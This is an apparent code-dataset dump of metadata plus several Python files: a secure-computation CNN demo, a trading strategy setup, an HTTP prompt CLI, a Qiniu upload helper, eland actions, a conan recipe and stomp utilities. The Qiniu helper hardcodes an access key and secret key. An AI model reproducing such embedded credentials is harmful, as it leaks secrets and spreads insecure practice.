hexsha stringlengths 40 40 | size int64 1 1.03M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 239 | max_stars_repo_name stringlengths 5 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 239 | max_issues_repo_name stringlengths 5 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 239 | max_forks_repo_name stringlengths 5 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.03M | avg_line_length float64 1 958k | max_line_length int64 1 1.03M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
795abd1dbdbc0837bc1b5dc50b787c3d8106fc72 | 6,940 | py | Python | demos/cnnmnist_plain.py | cyckun/mpyc | ed8546ab20d77b9d612528e82cb1501b85c2b673 | [
"MIT"
] | null | null | null | demos/cnnmnist_plain.py | cyckun/mpyc | ed8546ab20d77b9d612528e82cb1501b85c2b673 | [
"MIT"
] | null | null | null | demos/cnnmnist_plain.py | cyckun/mpyc | ed8546ab20d77b9d612528e82cb1501b85c2b673 | [
"MIT"
] | null | null | null | """ Demo Convolutional Neural Network (CNN) MNIST classifier.
The MNIST dataset of handwritten digits consists of a training set of
60,000 images of a test set of 10,000 images. The training images have been
used in the clear to obtain a highly reliable CNN classifier. The demo
feeds the classifier with random test images keeping both the CNN parameters
(neuron weights and bias for all layers) and the test image secret.
The secure CNN classifier is run either with scaled secure integers or
with secure fixed-point numbers. Barriers are used to throttle the MPyC
secure computation (reduces memory usage).
"""
import os
import sys
import logging
import random
import gzip
import numpy as np
from mpyc.runtime import mpc
secnum = None
def scale_to_int(f):
if issubclass(secnum, mpc.Integer):
scale = lambda a: secnum(int(round(a * f))) # force Python integers
else:
scale = lambda a: secnum(float(a)) # force Python floats
return np.vectorize(scale)
def load(name, f, a=2):
W = np.load(os.path.join('data', 'cnn', 'W_' + name + '.npy'))
# print("type of W:", type(W))
W = scale_to_int(1 << f)(W)
b = np.load(os.path.join('data', 'cnn', 'b_' + name + '.npy'))
b = scale_to_int(1 << (a * f))(b)
return W, b
def dim(x): # dimensions of tensor x
if isinstance(x, np.ndarray):
s = list(x.shape)
else:
s = []
while isinstance(x, list):
s.append(len(x))
x = x[0]
return s
@mpc.coroutine
async def convolvetensor(x, W, b):
logging.info('- - - - - - - - conv2d - - - - - - -')
# 2D convolutions on m*n sized images from X with s*s sized filters from W.
# b is of dimension v
k, r, m, n = dim(x)
x = x.tolist()
v, r, s, s = dim(W)
W = W.tolist()
stype = type(x[0][0][0][0])
await mpc.returnType(stype, k, v, m, n)
x, W, b = await mpc.gather(x, W, b)
Y = [[[[b[j]]*m for _ in range(n)] for j in range(v)] for _ in range(k)]
counter = 0
for i in range(k):
for j in range(v):
for l in range(r):
counter += 1
if counter % 500 == 0:
await mpc.barrier()
Y[i][j] = mpc.matrix_add(Y[i][j], inprod2D(x[i][l], W[j][l]))
for i in range(k):
for j in range(v):
for im in range(m):
Y[i][j][im] = mpc._reshare(Y[i][j][im])
Y = await mpc.gather(Y)
if issubclass(stype, mpc.FixedPoint):
l = stype.bit_length
Y = [[[mpc.trunc(y, f=stype.frac_length, l=l) for y in _] for _ in _] for _ in Y]
Y = await mpc.gather(Y)
return Y
# k, v, m, n = dim(Y)
def inprod2D(X, W):
m, n = dim(X)
s = len(W) # s * s filter W
s2 = (s-1) // 2
Y = [None] * m
for i in range(m):
Y[i] = [None] * n
for j in range(n):
t = 0
ix = i - s2
for di in range(s):
if 0 <= ix < m:
jx = j - s2
for dj in range(s):
if 0 <= jx < n:
t += X[ix][jx].value * W[di][dj].value
jx += 1
ix += 1
Y[i][j] = t
return Y
def tensormatrix_prod(x, W, b):
logging.info('- - - - - - - - fc - - - - - - -')
W, b = W.tolist(), b.tolist()
return [mpc.vector_add(mpc.matrix_prod([z.tolist()], W)[0], b) for z in x]
def maxpool(x):
logging.info('- - - - - - - - maxpool - - - - - - -')
# maxpooling 2 * 2 squares in images of size m * n with stride 2
k, r, m, n = dim(x)
Y = [[[[mpc.max(y[i][j], y[i][j+1], y[i+1][j], y[i+1][j+1])
for j in range(0, n, 2)] for i in range(0, m, 2)]
for y in z] for z in x]
return np.array(Y)
def ReLU(x):
logging.info('- - - - - - - - ReLU - - - - - - -')
return np.vectorize(lambda a: (a >= 0) * a)(x)
async def main():
global secnum
k = 1 if len(sys.argv) == 1 else float(sys.argv[1])
if k - int(k) == 0.5:
secnum = mpc.SecFxp(10, 4)
else:
secnum = mpc.SecInt(37)
batch_size = round(k - 0.01)
await mpc.start()
if len(sys.argv) <= 2:
offset = random.randrange(10001 - batch_size) if mpc.pid == 0 else None
offset = await mpc.transfer(offset, senders=0)
else:
offset = int(sys.argv[2])
f = 6
logging.info('--------------- INPUT -------------')
print(f'Type = {secnum.__name__}, range = ({offset}, {offset + batch_size})')
# read batch_size labels and images at given offset
df = gzip.open(os.path.join('data', 'cnn', 't10k-labels-idx1-ubyte.gz'))
d = df.read()[8 + offset: 8 + offset + batch_size]
labels = list(map(int, d))
print('Labels:', labels)
df = gzip.open(os.path.join('data', 'cnn', 't10k-images-idx3-ubyte.gz'))
d = df.read()[16 + offset * 28**2: 16 + (offset + batch_size) * 28**2]
print("type d:", type(d))
x = list(map(lambda a: a/255, d))
print("x= ", x)
x = np.array(x).reshape(batch_size, 1, 28, 28)
if batch_size == 1:
print(np.array2string(np.vectorize(lambda a: int(bool(a)))(x[0, 0]), separator=''))
# above is plain, below is cipher;
print("length of x:", len(x), sys.getsizeof(x))
x = scale_to_int(1 << f)(x) # convert plain to cipher;
logging.info('--------------- LAYER 1 -------------')
W, b = load('conv1', f)
x = convolvetensor(x, W, b)
await mpc.barrier()
if issubclass(secnum, mpc.Integer):
secnum.bit_length = 16
x = maxpool(x)
await mpc.barrier()
x = ReLU(x)
await mpc.barrier()
logging.info('--------------- LAYER 2 -------------')
W, b = load('conv2', f, 3)
x = convolvetensor(x, W, b)
await mpc.barrier()
if issubclass(secnum, mpc.Integer):
secnum.bit_length = 23
x = maxpool(x)
await mpc.barrier()
x = ReLU(x)
await mpc.barrier()
logging.info('--------------- LAYER 3 -------------')
x = x.reshape(batch_size, 64 * 7**2)
W, b = load('fc1', f, 4)
x = tensormatrix_prod(x, W, b)
if issubclass(secnum, mpc.Integer):
secnum.bit_length = 30
x = ReLU(x)
await mpc.barrier()
logging.info('--------------- LAYER 4 -------------')
W, b = load('fc2', f, 5)
x = tensormatrix_prod(x, W, b)
logging.info('--------------- OUTPUT -------------')
if issubclass(secnum, mpc.Integer):
secnum.bit_length = 37
for i in range(batch_size):
tmp = mpc.argmax(x[i])[0] # (index, x[index]), tmp is index;
print("tmp:", tmp, mpc.argmax(x[i])[1].share)
prediction = int(await mpc.output(tmp))
error = '******* ERROR *******' if prediction != labels[i] else ''
print(f'Image #{offset+i} with label {labels[i]}: {prediction} predicted. {error}')
print(await mpc.output(x[i]))
await mpc.shutdown()
if __name__ == '__main__':
mpc.run(main())
| 31.545455 | 91 | 0.530259 |
795abdb9b781178d184fd2bc2305f52f575b3ddf | 1,596 | py | Python | pluto/strategies/setup.py | chalant/pluto | e7bfd35a2c1fc0e0753bd2f840b0a4385b5124fc | [
"Apache-2.0"
] | null | null | null | pluto/strategies/setup.py | chalant/pluto | e7bfd35a2c1fc0e0753bd2f840b0a4385b5124fc | [
"Apache-2.0"
] | null | null | null | pluto/strategies/setup.py | chalant/pluto | e7bfd35a2c1fc0e0753bd2f840b0a4385b5124fc | [
"Apache-2.0"
] | null | null | null | from sqlalchemy import text
from zipline.finance import cancel_policy
_GET_STRATEGY_SETUP = text(
"""
SELECT * FROM strategy_setup
WHERE strategy_id=:strategy_id
""")
_SAVE_STRATEGY_SETUP = text(
"""
INSERT OR REPLACE INTO strategies
VALUES
""")
_SAVE_STRATEGY_ASSET_CLASS = text(
"""
INSERT OR REPLACE INTO strategy_asset_classes
VALUES
"""
)
class StrategySetup(object):
def __init__(self, strategy_id):
self.__strategy_id = strategy_id
self.look_back = 150
self.cancel_policy = 'never cancel'
self.shorting = True
self.asset_classes = 'equity'
self.data_frequency = 'daily'
self.fractional = False
self.cancel_policy = cancel_policy.NeverCancel()
@property
def strategy_id(self):
return self.__strategy_id
def get_strategy_setup(connection, strategy_id):
stp = StrategySetup(strategy_id)
res = connection.execute(
strategy_id=strategy_id)
if res:
stp.look_back = res['look_back']
stp.shorting = res['shorting']
return stp
def save_strategy_setup(connection, strategy_setup):
connection.execute(
_SAVE_STRATEGY_SETUP,
look_back=strategy_setup.look_back,
shorting=strategy_setup.shorting,
data_frequency=strategy_setup.data_frequency
)
for asset_class in strategy_setup.asset_classes.split(","):
connection.execute(
_SAVE_STRATEGY_ASSET_CLASS,
asset_class=asset_class,
strategy_id=strategy_setup.strategy_id
)
| 23.130435 | 63 | 0.671053 |
795abdd3aa0e624f4df1b77729d950a10efce1e5 | 5,422 | py | Python | http_prompt/cli.py | KiranBaktha/http-prompt | 87f1e9d82f790bcee650b2cbb377b07c8ed3f20b | [
"MIT"
] | null | null | null | http_prompt/cli.py | KiranBaktha/http-prompt | 87f1e9d82f790bcee650b2cbb377b07c8ed3f20b | [
"MIT"
] | null | null | null | http_prompt/cli.py | KiranBaktha/http-prompt | 87f1e9d82f790bcee650b2cbb377b07c8ed3f20b | [
"MIT"
] | null | null | null | from __future__ import unicode_literals
import json
import os
import re
import sys
import click
from httpie.plugins import FormatterPlugin # noqa, avoid cyclic import
from httpie.output.formatters.colors import Solarized256Style
from prompt_toolkit import prompt, AbortAction
from prompt_toolkit.auto_suggest import AutoSuggestFromHistory
from prompt_toolkit.history import FileHistory
from prompt_toolkit.layout.lexers import PygmentsLexer
from prompt_toolkit.styles.from_pygments import style_from_pygments
from pygments.styles import get_style_by_name
from pygments.util import ClassNotFound
from six.moves.http_cookies import SimpleCookie
from six.moves.urllib.request import urlopen, pathname2url
from . import __version__
from . import config
from .completer import HttpPromptCompleter
from .context import Context
from .contextio import load_context, save_context
from .execution import execute
from .lexer import HttpPromptLexer
from .utils import smart_quote
from .xdg import get_data_dir
# XXX: http://click.pocoo.org/python3/#unicode-literals
click.disable_unicode_literals_warning = True
def fix_incomplete_url(url):
if url.startswith(('s://', '://')):
url = 'http' + url
elif url.startswith('//'):
url = 'http:' + url
elif not url.startswith(('http://', 'https://')):
url = 'http://' + url
return url
def update_cookies(base_value, cookies):
cookie = SimpleCookie(base_value)
for k, v in cookies.items():
cookie[k] = v
return cookie.output(header='', sep=';').lstrip()
class ExecutionListener(object):
def __init__(self, cfg):
self.cfg = cfg
def context_changed(self, context):
# Dump the current context to HTTP Prompt format
save_context(context)
def response_returned(self, context, response):
if not response.cookies:
return
cookie_pref = self.cfg.get('set_cookies') or 'auto'
if cookie_pref == 'auto' or (
cookie_pref == 'ask' and
click.confirm("Cookies incoming! Do you want to set them?")):
existing_cookie = context.headers.get('Cookie')
new_cookie = update_cookies(existing_cookie, response.cookies)
context.headers['Cookie'] = new_cookie
click.secho('Cookies set: %s' % new_cookie)
def normalize_url(ctx, param, value):
if value:
if not re.search(r'^\w+://', value):
value = 'file:' + pathname2url(os.path.abspath(value))
return value
return None
@click.command(context_settings=dict(
ignore_unknown_options=True,
))
@click.option('--spec', help="OpenAPI/Swagger specification file.",
callback=normalize_url)
@click.option('--env', help="Environment file to preload.",
type=click.Path(exists=True))
@click.argument('url', default='')
@click.argument('http_options', nargs=-1, type=click.UNPROCESSED)
@click.version_option(message='%(version)s')
def cli(spec, env, url, http_options):
click.echo('Version: %s' % __version__)
copied, config_path = config.initialize()
if copied:
click.echo('Config file not found. Initialized a new one: %s' %
config_path)
cfg = config.load()
# Override pager/less options
os.environ['PAGER'] = cfg['pager']
os.environ['LESS'] = '-RXF'
if spec:
f = urlopen(spec)
try:
content = f.read().decode('utf-8')
try:
spec = json.loads(content)
except json.JSONDecodeError:
click.secho("Warning: Specification file '%s' is not JSON" %
spec, err=True, fg='red')
spec = None
finally:
f.close()
if url:
url = fix_incomplete_url(url)
context = Context(url, spec=spec)
output_style = cfg.get('output_style')
if output_style:
context.options['--style'] = output_style
# For prompt-toolkit
history = FileHistory(os.path.join(get_data_dir(), 'history'))
lexer = PygmentsLexer(HttpPromptLexer)
completer = HttpPromptCompleter(context)
try:
style_class = get_style_by_name(cfg['command_style'])
except ClassNotFound:
style_class = Solarized256Style
style = style_from_pygments(style_class)
listener = ExecutionListener(cfg)
if len(sys.argv) == 1:
# load previous context if nothing defined
load_context(context)
else:
if env:
load_context(context, env)
if url:
# Overwrite the env url if not default
context.url = url
if http_options:
# Execute HTTPie options from CLI (can overwrite env file values)
http_options = [smart_quote(a) for a in http_options]
execute(' '.join(http_options), context, listener=listener)
while True:
try:
text = prompt('%s> ' % context.url, completer=completer,
lexer=lexer, style=style, history=history,
auto_suggest=AutoSuggestFromHistory(),
on_abort=AbortAction.RETRY, vi_mode=cfg['vi'])
except EOFError:
break # Control-D pressed
else:
execute(text, context, listener=listener, style=style_class)
if context.should_exit:
break
click.echo("Goodbye!")
| 31.707602 | 77 | 0.644596 |
795abe90256ca40e56815b2b02ba73b0c8692fd3 | 606 | py | Python | info/utils/image_storage.py | gottuantuan/info_got | 80ee1e7005a7ee9d9fea20f84b5636cc3cc7c527 | [
"MIT"
] | null | null | null | info/utils/image_storage.py | gottuantuan/info_got | 80ee1e7005a7ee9d9fea20f84b5636cc3cc7c527 | [
"MIT"
] | null | null | null | info/utils/image_storage.py | gottuantuan/info_got | 80ee1e7005a7ee9d9fea20f84b5636cc3cc7c527 | [
"MIT"
] | null | null | null | from qiniu import Auth, put_data
access_key = 'XSOF7q0mcz3NkFDeXoiKL1SliQswpGp5sSvD44Pu'
secret_key = '1zTYK17VvDIvFHEILU-gp89bM3c4FPTFF7DtISsj'
bucket_name = 'infogot'
def storage(data):
try:
q = Auth(access_key, secret_key)
token = q.upload_token(bucket_name)
ret, info = put_data(token, None, data)
print(ret, info)
except Exception as e:
raise e;
if info.status_code != 200:
raise Exception("上传图片失败")
return ret["key"]
if __name__ == '__main__':
file = input('请输入文件路径')
with open(file, 'rb') as f:
storage(f.read()) | 23.307692 | 55 | 0.650165 |
795ac0a74c8a6c463c7404890792d7708073e868 | 3,287 | py | Python | eland/actions.py | redNixon/eland | 1b9cb1db6d30f0662fe3679c7bb31e2c0865f0c3 | [
"Apache-2.0"
] | null | null | null | eland/actions.py | redNixon/eland | 1b9cb1db6d30f0662fe3679c7bb31e2c0865f0c3 | [
"Apache-2.0"
] | null | null | null | eland/actions.py | redNixon/eland | 1b9cb1db6d30f0662fe3679c7bb31e2c0865f0c3 | [
"Apache-2.0"
] | null | null | null | # Copyright 2019 Elasticsearch BV
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from abc import ABC, abstractmethod
# -------------------------------------------------------------------------------------------------------------------- #
# PostProcessingActions #
# -------------------------------------------------------------------------------------------------------------------- #
from eland import SortOrder
class PostProcessingAction(ABC):
def __init__(self, action_type):
"""
Abstract class for postprocessing actions
Parameters
----------
action_type: str
The action type (e.g. sort_index, head etc.)
"""
self._action_type = action_type
@property
def type(self):
return self._action_type
@abstractmethod
def resolve_action(self, df):
pass
@abstractmethod
def __repr__(self):
pass
class SortIndexAction(PostProcessingAction):
def __init__(self):
super().__init__("sort_index")
def resolve_action(self, df):
return df.sort_index()
def __repr__(self):
return f"('{self.type}')"
class HeadAction(PostProcessingAction):
def __init__(self, count):
super().__init__("head")
self._count = count
def resolve_action(self, df):
return df.head(self._count)
def __repr__(self):
return f"('{self.type}': ('count': {self._count}))"
class TailAction(PostProcessingAction):
def __init__(self, count):
super().__init__("tail")
self._count = count
def resolve_action(self, df):
return df.tail(self._count)
def __repr__(self):
return f"('{self.type}': ('count': {self._count}))"
class SortFieldAction(PostProcessingAction):
def __init__(self, sort_params_string):
super().__init__("sort_field")
if sort_params_string is None:
raise ValueError("Expected valid string")
# Split string
sort_params = sort_params_string.split(":")
if len(sort_params) != 2:
raise ValueError(
f"Expected ES sort params string (e.g. _doc:desc). Got '{sort_params_string}'"
)
self._sort_field = sort_params[0]
self._sort_order = SortOrder.from_string(sort_params[1])
def resolve_action(self, df):
if self._sort_order == SortOrder.ASC:
return df.sort_values(self._sort_field, True)
return df.sort_values(self._sort_field, False)
def __repr__(self):
return f"('{self.type}': ('sort_field': '{self._sort_field}', 'sort_order': {self._sort_order}))"
| 30.155963 | 120 | 0.573471 |
795ac14dbcafb874c7b61401ca244826dc3458a6 | 464 | py | Python | key_logger.py | SebastianOhberg/keylogger | 666b1c7ffdd29976aee708bb14c8637803e41102 | [
"MIT"
] | null | null | null | key_logger.py | SebastianOhberg/keylogger | 666b1c7ffdd29976aee708bb14c8637803e41102 | [
"MIT"
] | null | null | null | key_logger.py | SebastianOhberg/keylogger | 666b1c7ffdd29976aee708bb14c8637803e41102 | [
"MIT"
] | null | null | null | import datetime
from pynput.keyboard import Listener
d = datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')
f = open('keylogger_{}.txt'.format(d), 'w')
def key_recorder(key):
key = str(key)
if key == 'Key.enter':
f.write('\n')
elif key == 'Key.space':
f.write(' ')
elif key == 'Key.backspace':
f.write('%BORRAR%')
else:
f.write(key.replace("'",""))
with Listener(on_press=key_recorder) as l:
l.join() | 23.2 | 57 | 0.573276 |
795ac2da37e1dcf26c60717615a95bb48a31ba3e | 9,112 | py | Python | recipes/diligent-core/all/conanfile.py | dssimonspoerri/conan-center-index | 83f1cbeb0407382be1c4011e66ca5cdaa634b18d | [
"MIT"
] | null | null | null | recipes/diligent-core/all/conanfile.py | dssimonspoerri/conan-center-index | 83f1cbeb0407382be1c4011e66ca5cdaa634b18d | [
"MIT"
] | null | null | null | recipes/diligent-core/all/conanfile.py | dssimonspoerri/conan-center-index | 83f1cbeb0407382be1c4011e66ca5cdaa634b18d | [
"MIT"
] | null | null | null | from conans import ConanFile, tools, CMake
from conans.errors import ConanInvalidConfiguration
import os
required_conan_version = ">=1.33.0"
class DiligentCoreConan(ConanFile):
name = "diligent-core"
url = "https://github.com/conan-io/conan-center-index"
homepage = "https://github.com/DiligentGraphics/DiligentCore"
description = "Diligent Core is a modern cross-platfrom low-level graphics API."
license = "Apache-2.0"
topics = ("graphics")
settings = "os", "compiler", "build_type", "arch"
options = {
"shared": [True, False],
"fPIC": [True, False],
}
default_options = {
"shared": False ,
"fPIC": True,
}
generators = "cmake_find_package", "cmake", "cmake_find_package_multi"
_cmake = None
exports_sources = ["CMakeLists.txt", "patches/**"]
short_paths = True
@property
def _source_subfolder(self):
return "source_subfolder"
@property
def _build_subfolder(self):
return "build_subfolder"
@property
def _minimum_compilers_version(self):
return {
"Visual Studio": "16",
"gcc": "6",
"clang": "3.4",
"apple-clang": "5.1",
}
@property
def _minimum_cpp_standard(self):
return 14
def validate(self):
if self.settings.compiler.get_safe("cppstd"):
tools.check_min_cppstd(self, self._minimum_cpp_standard)
min_version = self._minimum_compilers_version.get(str(self.settings.compiler))
if not min_version:
self.output.warn("{} recipe lacks information about the {} compiler support.".format(
self.name, self.settings.compiler))
else:
if tools.Version(self.settings.compiler.version) < min_version:
raise ConanInvalidConfiguration("{} requires C++{} support. The current compiler {} {} does not support it.".format(
self.name, self._minimum_cpp_standard, self.settings.compiler, self.settings.compiler.version))
if self.settings.compiler == "Visual Studio" and "MT" in self.settings.compiler.runtime:
raise ConanInvalidConfiguration("Visual Studio build with MT runtime is not supported")
def source(self):
tools.get(**self.conan_data["sources"][self.version], strip_root=True, destination=self._source_subfolder)
def package_id(self):
if self.settings.compiler == "Visual Studio":
if "MD" in self.settings.compiler.runtime:
self.info.settings.compiler.runtime = "MD/MDd"
else:
self.info.settings.compiler.runtime = "MT/MTd"
def configure(self):
if self.options.shared:
del self.options.fPIC
def config_options(self):
if self.settings.os == "Windows":
del self.options.fPIC
def _patch_sources(self):
for patch in self.conan_data["patches"][self.version]:
tools.patch(**patch)
def build_requirements(self):
self.build_requires("cmake/3.22.0")
def requirements(self):
self.requires("opengl/system")
self.requires("libjpeg/9d")
self.requires("libtiff/4.3.0")
self.requires("zlib/1.2.11")
self.requires("libpng/1.6.37")
self.requires("spirv-cross/cci.20210930")
self.requires("spirv-tools/1.3.204.0")
self.requires("vulkan-headers/1.3.204")
self.requires("volk/1.3.204")
self.requires("glslang/1.3.204.0")
self.requires("xxhash/0.8.0")
if self.settings.os in ["Linux", "FreeBSD"]:
self.requires("xorg/system")
if not tools.cross_building(self, skip_x64_x86=True):
self.requires("xkbcommon/1.3.1")
def _diligent_platform(self):
if self.settings.os == "Windows":
return "PLATFORM_WIN32"
elif self.settings.os == "Macos":
return "PLATFORM_MACOS"
elif self.settings.os == "Linux":
return "PLATFORM_LINUX"
elif self.settings.os == "Android":
return "PLATFORM_ANDROID"
elif self.settings.os == "iOS":
return "PLATFORM_IOS"
elif self.settings.os == "Emscripten":
return "PLATFORM_EMSCRIPTEN"
elif self.settings.os == "watchOS":
return "PLATFORM_TVOS"
def _configure_cmake(self):
if self._cmake:
return self._cmake
self._cmake = CMake(self)
self._cmake.definitions["DILIGENT_BUILD_SAMPLES"] = False
self._cmake.definitions["DILIGENT_NO_FORMAT_VALIDATION"] = True
self._cmake.definitions["DILIGENT_BUILD_TESTS"] = False
self._cmake.definitions["DILIGENT_NO_DXC"] = True
self._cmake.definitions["SPIRV_CROSS_NAMESPACE_OVERRIDE"] = self.options["spirv-cross"].namespace
self._cmake.definitions["BUILD_SHARED_LIBS"] = False
self._cmake.definitions["ENABLE_RTTI"] = True
self._cmake.definitions["ENABLE_EXCEPTIONS"] = True
self._cmake.definitions[self._diligent_platform()] = True
self._cmake.configure(build_folder=self._build_subfolder)
return self._cmake
def build(self):
self._patch_sources()
cmake = self._configure_cmake()
cmake.build()
def package(self):
cmake = self._configure_cmake()
cmake.install()
tools.rename(src=os.path.join(self.package_folder, "include", "source_subfolder"),
dst=os.path.join(self.package_folder, "include", "DiligentCore"))
tools.rmdir(os.path.join(self.package_folder, "Licenses"))
tools.rmdir(os.path.join(self.package_folder, "lib"))
tools.rmdir(os.path.join(self.package_folder, "bin"))
self.copy("License.txt", dst="licenses", src=self._source_subfolder)
if self.options.shared:
self.copy(pattern="*.dylib", dst="lib", keep_path=False)
self.copy(pattern="*.so", dst="lib", keep_path=False)
self.copy(pattern="*.dll", dst="bin", keep_path=False)
tools.remove_files_by_mask(os.path.join(self.package_folder, "lib"), "*.a")
if self.settings.os is not "Windows":
tools.remove_files_by_mask(os.path.join(self.package_folder, "lib"), "*.lib")
else:
self.copy(pattern="*.a", dst="lib", keep_path=False)
self.copy(pattern="*.lib", dst="lib", keep_path=False)
tools.remove_files_by_mask(os.path.join(self.package_folder, "lib"), "*.dylib")
tools.remove_files_by_mask(os.path.join(self.package_folder, "lib"), "*.so")
tools.remove_files_by_mask(os.path.join(self.package_folder, "lib"), "*.dll")
self.copy(pattern="*.fxh", dst="res", keep_path=False)
self.copy("File2String*", src=os.path.join(self._build_subfolder, "bin"), dst="bin", keep_path=False)
tools.remove_files_by_mask(self.package_folder, "*.pdb")
def package_info(self):
self.cpp_info.libs = tools.collect_libs(self)
self.cpp_info.includedirs.append(os.path.join("include", "DiligentCore"))
self.cpp_info.includedirs.append(os.path.join("include", "DiligentCore", "Common", "interface"))
self.cpp_info.includedirs.append(os.path.join("include", "DiligentCore", "Primitives", "interface"))
self.cpp_info.includedirs.append(os.path.join("include", "DiligentCore", "Platforms", "interface"))
self.cpp_info.includedirs.append(os.path.join("include", "DiligentCore", "Platforms", "Basic", "interface"))
self.cpp_info.includedirs.append(os.path.join("include", "DiligentCore", "Platforms", "Linux", "interface"))
self.cpp_info.includedirs.append(os.path.join("include", "DiligentCore", "Graphics", "GraphicsEngine", "interface"))
self.cpp_info.includedirs.append(os.path.join("include", "DiligentCore", "Graphics", "GraphicsEngineD3D11", "interface"))
self.cpp_info.includedirs.append(os.path.join("include", "DiligentCore", "Graphics", "GraphicsEngineD3D12", "interface"))
self.cpp_info.includedirs.append(os.path.join("include", "DiligentCore", "Graphics", "GraphicsEngineVulkan", "interface"))
self.cpp_info.includedirs.append(os.path.join("include", "DiligentCore", "Graphics", "GraphicsEngineOpenGL", "interface"))
self.cpp_info.includedirs.append(os.path.join("include", "DiligentCore", "Graphics", "GraphicsAccessories", "interface"))
self.cpp_info.includedirs.append(os.path.join("include", "DiligentCore", "Graphics", "GraphicsTools", "interface"))
self.cpp_info.includedirs.append(os.path.join("include", "DiligentCore", "Graphics", "HLSL2GLSLConverterLib", "interface"))
self.cpp_info.defines.append("SPIRV_CROSS_NAMESPACE_OVERRIDE={}".format(self.options["spirv-cross"].namespace))
self.cpp_info.defines.append("{}=1".format(self._diligent_platform()))
if self.settings.os in ["Macos", "Linux"]:
self.cpp_info.system_libs = ["dl", "pthread"]
if self.settings.os == 'Macos':
self.cpp_info.frameworks = ["CoreFoundation", 'Cocoa']
| 45.108911 | 132 | 0.645193 |
795ac463a174cac6c514898ce79d2dbeb4e801bc | 2,216 | py | Python | lib/rucio/common/stomp_utils.py | ejr004/rucio | 81620cc54e3536e3656dfc83a4563da4ee39247e | [
"Apache-2.0"
] | 2 | 2020-02-18T22:34:24.000Z | 2022-03-09T16:26:18.000Z | lib/rucio/common/stomp_utils.py | ejr004/rucio | 81620cc54e3536e3656dfc83a4563da4ee39247e | [
"Apache-2.0"
] | null | null | null | lib/rucio/common/stomp_utils.py | ejr004/rucio | 81620cc54e3536e3656dfc83a4563da4ee39247e | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2022 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Eric Vaandering <ewv@fnal.gov>, 2022
"""
Common utility functions for stomp connections
"""
import socket
from stomp import Connection
import logging
def get_stomp_brokers(brokers, port, use_ssl, vhost, reconnect_attempts, ssl_key_file, ssl_cert_file, timeout,
logger=logging.log):
logger(logging.DEBUG, 'resolving broker dns alias: %s' % brokers)
brokers_resolved = []
for broker in brokers:
addrinfos = socket.getaddrinfo(broker, 0, socket.AF_INET, 0, socket.IPPROTO_TCP)
brokers_resolved.extend(ai[4][0] for ai in addrinfos)
logger(logging.DEBUG, 'broker resolved to %s', brokers_resolved)
conns = []
for broker in brokers_resolved:
if not use_ssl:
conns.append(Connection(host_and_ports=[(broker, port)],
use_ssl=False,
vhost=vhost,
timeout=timeout,
heartbeats=(0, 1000),
reconnect_attempts_max=reconnect_attempts))
else:
conns.append(Connection(host_and_ports=[(broker, port)],
use_ssl=True,
ssl_key_file=ssl_key_file,
ssl_cert_file=ssl_cert_file,
vhost=vhost,
timeout=timeout,
heartbeats=(0, 1000),
reconnect_attempts_max=reconnect_attempts))
return conns
| 37.559322 | 110 | 0.58574 |
795ac4674d1a8b0b6b3d9ea5b9067f63becc5b1c | 1,130 | py | Python | backend/models.py | vasspilka/Automata | e53bd5004283cded0bf01ec7dc1e05a202f9bd02 | [
"Unlicense",
"MIT"
] | null | null | null | backend/models.py | vasspilka/Automata | e53bd5004283cded0bf01ec7dc1e05a202f9bd02 | [
"Unlicense",
"MIT"
] | null | null | null | backend/models.py | vasspilka/Automata | e53bd5004283cded0bf01ec7dc1e05a202f9bd02 | [
"Unlicense",
"MIT"
] | null | null | null | import db
import config
import logging
logging.basicConfig(format='%(asctime)s %(levelname)s:%(message)s',
filename='automata.log', level=logging.DEBUG)
DB = db.Database(config.SQL.HOST, config.SQL.USERNAME,
config.SQL.PASSWORD, config.SQL.DATABASE)
logging.info("Connected to SQL database\n")
class Automaton(object):
def create(self, name, data, uid=''):
return DB.insert('automata', {'name': name, 'data': data, 'uid': uid})
def view(self, id):
return DB.selectOne('automata', {'id': id}, ('id', 'name', 'data', 'uid'))
def delete(self, id):
pass
def update(self, id, name, data):
pass
class User(object):
def get(self, gid):
return DB.selectOne("users", {'gid': gid})
def create(self, info):
return DB.insert('users', {'gid': info['google_id'], 'name': info['name'],
'email': info['email'], 'picture': info['picture']})
def automata(self, gid):
user = DB.selectOne("users", {'gid': gid})
if user:
return DB.select("automata", {'uid': user['gid']})
| 28.25 | 82 | 0.576991 |
795ac493b0670e8e939dde754e82e5fdeb766478 | 1,794 | py | Python | openslides_backend/action/actions/projector/control_view.py | MJJojo97/openslides-backend | af0d1edb0070e352d46f285a1ba0bbe3702d49ae | [
"MIT"
